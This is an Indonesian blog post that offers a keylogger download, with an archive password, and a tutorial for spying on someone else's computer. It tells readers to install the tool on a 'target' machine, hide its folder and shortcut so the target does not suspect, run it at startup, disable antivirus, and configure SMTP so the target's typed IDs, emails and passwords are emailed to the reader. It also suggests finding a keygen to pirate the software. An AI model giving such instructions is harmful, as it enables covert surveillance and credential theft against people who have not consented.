DOWNLOAD KEYLOGGER + tutorial

dalam posting sebelumnya admin telah meng share applikais descryptor(yahoo password descryptor,facebook password descryptor, twitter password descryptor dll.) yaitu applikasi pendetct akun pada sebuah komp. untuklebih lanjut klik disini,,

tapi kali ini admin bakal ngeshare applikasi pemdetect yang jauh lebih canggih di banding applikasi descryptor(apaan tuh??!) namanya keylogger (hah??!)

sebelum lebih jauh tentang manfaat keylogger kita bakal bahas secara keseluruhan tentang key logger
keylogger adallah sebuah applikasi yang di gunakan untuk merekam semua aktifitas keyboard pada komp. (semacam spy) jadi komp. target bisa kita spy pake ini applikasi dengan menginstall nya di komp. target,,  tapi setelah di install admin anjurkan untuk menghide folder apllikasi tersebut di programfile (biar gak ketahuan) dan juga shorcut yang biasanya muncul pada dekstop,,

keunggulan applikasi ini debanding dengan descryptor adalah apabila taerget memasukan id dan
password menggnakan komp. tersebt maka pasti id/email dan password target pasti terdetect di key logger,, dan tahap akhir agan2 tinggal buka deh itu applikasi di komp. target dengan alasan2 yang bisa dibuat sendiri (heheheh)

oke tanpa banayak omong langsung aja download keylogger nya... serial number
pass: cirebon-cyber4rt
UNTUK KEYGEN NYA  searching aja di mbah google
warning : saat diinstall oleh anti virus akan di detect virus padahal asli nya bukan virus, sillahkan enable dulu anti virus nya....

cara setingan dasar:
___________________________________________________________________________________
1.setelah di buka maka pencet tulisan continue evaluation
2.setelah itu klik knan option pada icon yang bagian pojok kanan dekstop
3.centang tulisan "run on windows startup"
4.klik ok deh...
5. jika ingin membuka nya bisa pencet ctrl+alt+L atau klik icon yang di dekstop pojok kanan klik view log
6.klik kanan pada icon yang tadi dan klik password,, nah tentukan deh password nya.. FINISH!!
___________________________________________________________________________________
nih TUTORIAL NYA : 1.install itu keylogger di komp. target kalu bisa di hidden biar ga curiga si target
2. jika sudah dinsstall klik icon keylogger yang ada pada pojok bawah kanan dekstop ,kilik option pilih      
   email
3.akan ada 2 konten scheduler dan delivery
4.pada kotak scheduler centang tulsan "try to send logs by email every"
5.dan pada kotak delivey centang tulisan "send to' dan masukan email anda yang akan dikirimi informasi dari komp. target (jika agan ingin meng spy target dari jarak jauh,, kalau dari jarak deket: pinjem komp./laptop target lalu pencet tombol ctrl+alt+L)
6.untuk smtp server masukan smtp provider dari email anda
7.untuk mengaktifkan smtp terlebih dahulu harus di aktifkan dai email anda sendiri, untuk cari tau gimana cara aktifin smtp bisa cari di mbah google
8.biarkan port number ya 25
9.masukan username dan password yang bisa di dapat saat mengaktifkan smtp 
10. authentication method pilh auth login, untuk mencoba silahkan klik send...

NB: UNTUK TUTORIAL NOMOR 1-10, YANG BERBAU DENGAN EMAIL ITU BERARTI CRA MENSETING AGAR DAPAT MENG SPY JARAK JAUH DENGAN EMAIL


sumber gambar dan link serta beberapa dalam tutorial :
http://www.downloadgratis34.com http://cirebon-cyber4rt.blogspot.com 
Share this article :
 
Comments
1 Comments

+ komentar + 1 komentar

12 Juli 2012 19.26

Semua kommentar yang ditanayakan akan saya jawab semampu saya atau bisa di tanyakan pada fanpage facebook (https://facebook.com/zathura.zeal)

trimaksih sebelum nya...

Poskan Komentar

Biasakn untuk berkomentar, setiap komenntar akan saya tanggapi semampu saya

-jangan spam
-jangan menghina
-jangan pornografi

trims..

Welcome! close
 
Support : Zathuragen Blog | JOU Tamplate | Blog tamplate
Copyright © 2011. Zathuragen Blog - All Rights Reserved
Template Created by Creating Website Published by JOU Template
Proudly powered by Blogger-Indonesia
Minal aidzin walfaizin, mohon maaf lahir dan batin....
ans!!